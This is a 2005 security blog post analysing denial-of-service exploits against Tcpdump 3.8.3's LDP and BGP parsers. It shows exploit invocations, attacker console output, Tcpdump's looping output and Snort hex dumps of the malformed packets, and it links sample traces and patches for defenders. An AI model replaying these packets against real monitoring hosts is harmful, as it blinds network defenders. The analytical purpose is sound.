Thursday, April 28, 2005

Tcpdump Vulnerabilities

I learned of four vulnerabilities in Tcpdump found by Vade79 by checking the latest exploits at Packet Storm. Linking to the exploits themselves, they are:

xtcpdump-ldp-dos.c: Tcpdump 3.8.3 and below mishandles Multi-Protocol Label Switching (MPLS) Label Distribution Protocol (LDP) packets. The effect is a local denial of service to Tcpdump. No system needs to be listening to port 646 TCP for Tcpdump to be affected.

If you run xtcpdump-ldp-dos, it looks like this to the attacker:

./xtcpdump-ldp-dos 192.168.1.1 nospoof
[*] tcpdump[3.8.x]: (LDP) ldp_print() infinite loop DOS.
[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)

[*] destination : 192.168.1.1
[*] amount : 5

[+] sending(packet = .): .....

[*] done.

Here is how Tcpdump handles it, if you're running Tcpdump "live" on the CLI without the -v switch:

Unknown Message (0x7fff), length: 0, Message ID:
0xffffffff, Flags: [continue processing if unknown]
Unknown Message (0x7fff), length: 0, Message ID:
0xffffffff, Flags: [continue processing if unknown]
...continues...

If you add the -v switch, you see this:

09:09:02.092665 IP (tos 0x0, ttl 64, id 41668, offset 0,
flags [none], length: 46) 192.168.1.5.52016 > 192.168.1.1.646:
[udp sum ok]
LDP, Label-Space-ID: 255.255.255.255:65535, length: 18
Unknown Message (0x7fff), length: 0, Message ID:
0xffffffff, Flags: [continue processing if unknown]
0x0000: 0402 6ee0 7042 0e6a 0100 4600 0000 4600
0x0010: 0000 1200 0030 4841 f956 00c0 9f3f 4fc5
0x0020: 0800 4500 0038 917f 0000 4001 65ef c0a8
0x0030: 0101 c0a8 0105 0303 2f2c 0000 0000 4500
0x0040: 002e a2c4 0000 4011 54a4 c0a8 0105 c0a8
0x0050: 0101 cb30 0286 001a 0000 6ee0 7042 3b53
0x0060: 0200 3c00 0000 3c00 0000 1200 00c0 9f3f
0x0070: 4fc5 0030 4841 f956 0800 4500 002e a2c5
0x0080: 0000 4011 54a3 c0a8 0105 c0a8 0101 cb31
0x0090: 0286 001a aeaa 0001 ffff ffff ffff ffff
0x00a0: ffff 0000 ffff ffff 1e38 6ee0 7042 4953
0x00b0: 0200 4600 0000 4600 0000 1200 0030 4841
0x00c0: f956 00c0 9f3f 4fc5 0800 4500 0038 9180
0x00d0: 0000 4001 65ee c0a8 0101 c0a8 0105 0303
0x00e0: 2f2b 0000 0000 4500 002e a2c5 0000 4011
0x00f0: 54a3 c0a8 0105 c0a8 0101 cb31 0286 001a
0x0100: 0000 6ee0 7042 783d 0300 3c00 0000 3c00
0x0110: 0000 1200 00c0 9f3f 4fc5 0030 4841 f956
...continues...

Here is how Snort sees the traffic. Only one packet is shown.

04/28-09:07:30.928973 192.168.1.5:52016 -> 192.168.1.1:646
UDP TTL:64 TOS:0x0 ID:41668 IpLen:20 DgmLen:46
Len: 18
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 2E A2 C4 00 00 40 11 54 A4 C0 A8 01 05 C0 A8 ......@.T.......
0x0020: 01 01 CB 30 02 86 00 1A AE AB 00 01 FF FF FF FF ...0............
0x0030: FF FF FF FF FF FF 00 00 FF FF FF FF ............

Here is sample traffic for you to try: ldp-dos.taosecurity.lpc. You should be able to run this through Tcpdump using the -r option without killing Tcpdump.

xtcpdump-bgp-dos.c: Tcpdump 3.8.3 and below mishandles Border Gateway Protocol (BGP) packets. The effect is a local denial of service to Tcpdump. A system watched by Tcpdump needs to be listening on port 179 TCP for Tcpdump to be affected. I simulated this by having Netcat listen on port 179 TCP.

If you run xtcpdump-bgp-dos.c, it looks like this to the attacker:

./xtcpdump-bgp-dos.c 192.168.1.1 nospoof
[*] tcpdump[3.8.x]: (BGP) RT_ROUTING_INFO infinite loop DOS.
[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)

[*] target: 192.168.1.1
[*] attempting to connect...
[*] successfully connected.
[*] sending malformed BGP data. (34 bytes)
[*] closing connection.

[*] done.

Here is how Tcpdump handles it, if you're running Tcpdump "live" on the CLI:

tcpdump -n -i em1 -s 1515 -v

tcpdump: listening on em1, link-type EN10MB (Ethernet), capture size 1515 bytes
09:04:48.530004 IP (tos 0x0, ttl 64, id 37797, offset 0,
flags [DF], length: 60) 192.168.1.5.57471 > 192.168.1.1.179:
S [tcp sum ok] 2061108147:2061108147(0) win 65535


09:04:48.530039 IP (tos 0x0, ttl 64, id 30686, offset 0,
flags [DF], length: 60) 192.168.1.1.179 > 192.168.1.5.57471:
S [bad tcp cksum 8385 (->b9d4)!] 2753925437:2753925437(0)
ack 2061108148 win 65535 timestamp 207951117 145837700>

09:04:48.530250 IP (tos 0x0, ttl 64, id 37798, offset 0,
flags [DF], length: 52) 192.168.1.5.57471 > 192.168.1.1.179:
. [tcp sum ok] ack 1 win 33304 145837700 207951117>

09:04:49.031589 IP (tos 0x0, ttl 64, id 37800, offset 0,
flags [DF], length: 87) 192.168.1.5.57471 > 192.168.1.1.179:
P [tcp sum ok] 1:36(35) ack 1 win 33304 145837751 207951117>: BGP, length: 35
Update Message (2), length: 19
Withdrawn routes: 1 bytes
Multi-Protocol Reach NLRI (14), length: 255,
Flags [OTPE+f]:
AFI: IPv4 (1), vendor specific SAFI: Route Target
Routing Information (132), no SNPA
(illegal prefix length)
(illegal prefix length)
...continues...

Here is how Snort sees the traffic. Although the entire session is shown, the fourth packet is the killer.

04/28-09:03:17.383320 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:37797 IpLen:20 DgmLen:60 DF
******S* Seq: 0x7ADA03B3 Ack: 0x0 Win: 0xFFFF TcpLen: 40
TCP Options (6) => MSS: 1460 NOP WS: 1 NOP NOP TS: 145837700 0
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 3C 93 A5 40 00 40 06 23 C0 C0 A8 01 05 C0 A8 .<..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B3 00 00 00 00 A0 02 ......z.........
0x0030: FF FF 10 BB 00 00 02 04 05 B4 01 03 03 01 01 01 ................
0x0040: 08 0A 08 B1 4E 84 00 00 00 00 ....N.....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.383581 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:30686 IpLen:20 DgmLen:60 DF
***A**S* Seq: 0xA425913D Ack: 0x7ADA03B4 Win: 0xFFFF TcpLen: 40
TCP Options (6) => MSS: 1460 NOP WS: 1 NOP NOP TS: 207951117 145837700
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 3C 77 DE 40 00 40 06 3F 87 C0 A8 01 01 C0 A8 .0x0020: 01 05 00 B3 E0 7F A4 25 91 3D 7A DA 03 B4 A0 12 .......%.=z.....
0x0030: FF FF B9 D4 00 00 02 04 05 B4 01 03 03 01 01 01 ................
0x0040: 08 0A 0C 65 15 0D 08 B1 4E 84 ...e....N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.383646 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:37798 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x7ADA03B4 Ack: 0xA425913E Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837700 207951117
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 34 93 A6 40 00 40 06 23 C7 C0 A8 01 05 C0 A8 .4..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B4 A4 25 91 3E 80 10 ......z....%.>..
0x0030: 82 18 63 81 00 00 01 01 08 0A 08 B1 4E 84 0C 65 ..c.........N..e
0x0040: 15 0D ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.884950 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:37800 IpLen:20 DgmLen:87 DF
***AP*** Seq: 0x7ADA03B4 Ack: 0xA425913E Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837751 207951117
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 57 93 A8 40 00 40 06 23 A2 C0 A8 01 05 C0 A8 .W..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B4 A4 25 91 3E 80 18 ......z....%.>..
0x0030: 82 18 DC FF 00 00 01 01 08 0A 08 B1 4E B7 0C 65 ............N..e
0x0040: 15 0D FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
0x0050: FF FF 00 13 02 00 01 00 FF 00 FF 0E 00 FF 00 01 ................
0x0060: 84 00 00 00 00 .....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.984345 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:30793 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xA425913E Ack: 0x7ADA03D7 Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 207951178 145837751
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 34 78 49 40 00 40 06 3F 24 C0 A8 01 01 C0 A8 .4xI@.@.?$......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3E 7A DA 03 D7 80 10 .......%.>z.....
0x0030: 82 18 62 EE 00 00 01 01 08 0A 0C 65 15 4A 08 B1 ..b........e.J..
0x0040: 4E B7 N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396501 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:38045 IpLen:20 DgmLen:52 DF
***A***F Seq: 0x7ADA03D7 Ack: 0xA425913E Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837802 207951178
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 34 94 9D 40 00 40 06 22 D0 C0 A8 01 05 C0 A8 .4..@.@.".......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 D7 A4 25 91 3E 80 11 ......z....%.>..
0x0030: 82 18 62 BA 00 00 01 01 08 0A 08 B1 4E EA 0C 65 ..b.........N..e
0x0040: 15 4A .J

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396841 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:31075 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xA425913E Ack: 0x7ADA03D8 Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 207951219 145837802
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 34 79 63 40 00 40 06 3E 0A C0 A8 01 01 C0 A8 .4yc@.@.>.......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3E 7A DA 03 D8 80 10 .......%.>z.....
0x0030: 82 18 62 91 00 00 01 01 08 0A 0C 65 15 73 08 B1 ..b........e.s..
0x0040: 4E EA N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396856 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:31076 IpLen:20 DgmLen:52 DF
***A***F Seq: 0xA425913E Ack: 0x7ADA03D8 Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 207951219 145837802
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 34 79 64 40 00 40 06 3E 09 C0 A8 01 01 C0 A8 .4yd@.@.>.......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3E 7A DA 03 D8 80 11 .......%.>z.....
0x0030: 82 18 62 90 00 00 01 01 08 0A 0C 65 15 73 08 B1 ..b........e.s..
0x0040: 4E EA N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396922 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:38046 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x7ADA03D8 Ack: 0xA425913F Win: 0x8217 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837802 207951219
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 34 94 9E 40 00 40 06 22 CF C0 A8 01 05 C0 A8 .4..@.@.".......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 D8 A4 25 91 3F 80 10 ......z....%.?..
0x0030: 82 17 62 91 00 00 01 01 08 0A 08 B1 4E EA 0C 65 ..b.........N..e
0x0040: 15 73 .s

Here is sample traffic for you to try: bgp-dos.taosecurity.lpc. You should be able to run this through Tcpdump using the -r option without killing Tcpdump.

Vade79 also released exploits titled xtcpdump-isis-dos.c and xtcpdump+ethr-rsvp-dos.c, for Intermediate System to Intermediate System (IS-IS) and Resource ReSerVation setup Protocol (RSVP), respectively.

While I could get all four exploits to compile on FreeBSD, I could not get these last two to generate traffic. I believe the problem lies with the spoofing mechanism in each exploit. I was only able to get the first two exploits to work when I enabled the "nospoof" options.

Keep an eye on Tcpdump.org and the tcpdump-workers mailing list for developments. The latest tcpdump-current.tar.gz or CVS check-outs should be patched. I also expect to see a Tcpdump 3.9.0 official release patched against these problems next week.

No comments: